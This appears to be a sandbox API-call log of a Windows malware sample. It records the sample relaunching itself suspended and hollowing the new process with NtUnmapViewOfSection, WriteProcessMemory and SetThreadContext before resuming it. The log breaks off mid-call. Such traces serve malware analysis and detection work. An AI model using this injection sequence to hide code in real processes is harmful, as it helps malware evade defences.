GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.784] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0116.181] VirtualProtect (in: lpAddress=0x1634d0, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0116.182] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0116.182] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0116.182] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0116.182] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0116.183] GetProcAddress 
(hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0116.183] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0116.183] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0116.183] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0116.183] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0116.183] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0116.183] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0116.184] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0116.184] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0116.184] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0116.333] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", 
dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x90138 [0116.549] PostMessageA (hWnd=0x90138, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0116.549] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0116.549] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x3d0000 [0116.549] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3d0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0116.549] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0116.549] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xe5c, dwThreadId=0xe60)) returned 1 [0116.551] VirtualFree (lpAddress=0x3d0000, 
dwSize=0x0, dwFreeType=0x8000) returned 1 [0116.551] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x3d0000 [0116.551] GetThreadContext (in: hThread=0x48, lpContext=0x3d0000 | out: lpContext=0x3d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdc000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, 
[45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, 
[231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, 
[412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0116.648] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdc008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0116.649] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0116.649] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0116.649] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x164770*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x164770*, lpNumberOfBytesWritten=0x0) returned 1 [0116.650] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x164b70, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0116.650] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, 
lpBuffer=0x164b70*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x164b70*, lpNumberOfBytesWritten=0x0) returned 1 [0116.656] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1b9170*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b9170*, lpNumberOfBytesWritten=0x0) returned 1 [0116.657] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdc008, lpBuffer=0x1648a4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1648a4*, lpNumberOfBytesWritten=0x0) returned 1 [0116.657] SetThreadContext (hThread=0x48, lpContext=0x3d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdc000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, 
[10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, 
[200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, 
[381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0116.657] ResumeThread (hThread=0x48) returned 0x1 [0116.657] CloseHandle (hObject=0x48) returned 1 [0116.657] CloseHandle (hObject=0x4c) returned 1 [0116.657] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 